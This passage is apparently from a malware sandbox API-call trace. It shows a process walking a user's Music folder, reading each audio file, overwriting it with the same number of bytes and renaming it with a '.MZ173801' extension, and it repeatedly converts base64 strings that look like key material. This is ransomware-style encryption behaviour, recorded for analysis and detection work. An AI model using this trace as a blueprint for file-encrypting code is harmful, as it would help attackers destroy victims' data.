Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.658] GetCurrentThreadId () returned 0x1358 [0116.658] GetCurrentThreadId () returned 0x1358 [0116.658] GetCurrentThreadId () returned 0x1358 [0116.658] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\Q2PT-p_KEzetPwQd hO2.wav" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\q2pt-p_kezetpwqd ho2.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.658] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.658] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.658] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x9e83 [0116.658] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.658] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9e83, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x9e83, lpOverlapped=0x0) returned 1 [0116.659] CloseHandle (hObject=0x3d0) returned 1 [0116.660] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\Q2PT-p_KEzetPwQd hO2.wav" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\q2pt-p_kezetpwqd ho2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.661] WriteFile (in: hFile=0x3d0, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9e83, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f6f0*=0x9e83, lpOverlapped=0x0) returned 1 [0116.663] CloseHandle (hObject=0x3d0) returned 1 [0116.664] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\Q2PT-p_KEzetPwQd hO2.wav" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\q2pt-p_kezetpwqd ho2.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\Q2PT-p_KEzetPwQd hO2.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\q2pt-p_kezetpwqd ho2.wav.mz173801")) returned 1 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] GetCurrentThreadId () returned 0x1358 [0116.665] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5502a30, ftCreationTime.dwHighDateTime=0x1d5ed66, ftLastAccessTime.dwLowDateTime=0x358726f0, ftLastAccessTime.dwHighDateTime=0x1d5eace, ftLastWriteTime.dwLowDateTime=0x358726f0, ftLastWriteTime.dwHighDateTime=0x1d5eace, nFileSizeHigh=0x0, nFileSizeLow=0x9071, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="wk25qq4bwLfkVhGZ.m4a", cAlternateFileName="WK25QQ~1.M4A")) returned 1 [0116.665] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.665] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.665] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\wk25qq4bwLfkVhGZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wk25qq4bwlfkvhgz.m4a"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5502a30, ftCreationTime.dwHighDateTime=0x1d5ed66, ftLastAccessTime.dwLowDateTime=0x358726f0, ftLastAccessTime.dwHighDateTime=0x1d5eace, ftLastWriteTime.dwLowDateTime=0x358726f0, ftLastWriteTime.dwHighDateTime=0x1d5eace, nFileSizeHigh=0x0, nFileSizeLow=0x9071)) returned 1 [0116.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.665] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.666] GetCurrentThreadId () returned 0x1358 [0116.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\wk25qq4bwLfkVhGZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wk25qq4bwlfkvhgz.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.667] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0116.667] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.667] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x9071 [0116.667] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0116.667] ReadFile (in: hFile=0x3d0, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x9071, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0x9071, lpOverlapped=0x0) returned 1 [0116.668] CloseHandle (hObject=0x3d0) returned 1 [0116.668] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\wk25qq4bwLfkVhGZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wk25qq4bwlfkvhgz.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0116.670] WriteFile (in: hFile=0x3d0, lpBuffer=0x243bb60*, nNumberOfBytesToWrite=0x9071, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243bb60*, lpNumberOfBytesWritten=0x19f6f0*=0x9071, lpOverlapped=0x0) returned 1 [0116.671] CloseHandle (hObject=0x3d0) returned 1 [0116.672] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\wk25qq4bwLfkVhGZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wk25qq4bwlfkvhgz.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\wk25qq4bwLfkVhGZ.m4a.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wk25qq4bwlfkvhgz.m4a.mz173801")) returned 1 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] GetCurrentThreadId () returned 0x1358 [0116.908] FindNextFileW (in: hFindFile=0xa1bb60, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0c740, ftCreationTime.dwHighDateTime=0x1d5e738, ftLastAccessTime.dwLowDateTime=0x4f132200, ftLastAccessTime.dwHighDateTime=0x1d5f00e, ftLastWriteTime.dwLowDateTime=0x4f132200, ftLastWriteTime.dwHighDateTime=0x1d5f00e, nFileSizeHigh=0x0, nFileSizeLow=0x17946, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="WZY4fY8_E--mGLKS21.mp3", cAlternateFileName="WZY4FY~1.MP3")) returned 1 [0116.908] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0116.908] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0116.908] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\5xR3\\WZY4fY8_E--mGLKS21.mp3" (normalized: "c:\\users\\fd1hvy\\music\\5xr3\\wzy4fy8_e--mglks21.mp3"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab0c740, ftCreationTime.dwHighDateTime=0x1d5e738, ftLastAccessTime.dwLowDateTime=0x4f132200, ftLastAccessTime.dwHighDateTime=0x1d5f00e, ftLastWriteTime.dwLowDateTime=0x4f132200, ftLastWriteTime.dwHighDateTime=0x1d5f00e, nFileSizeHigh=0x0, nFileSizeLow=0x17946)) returned 1 [0116.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0116.908] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.909] GetCurrentThreadId () returned 0x1358 [0116.909] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 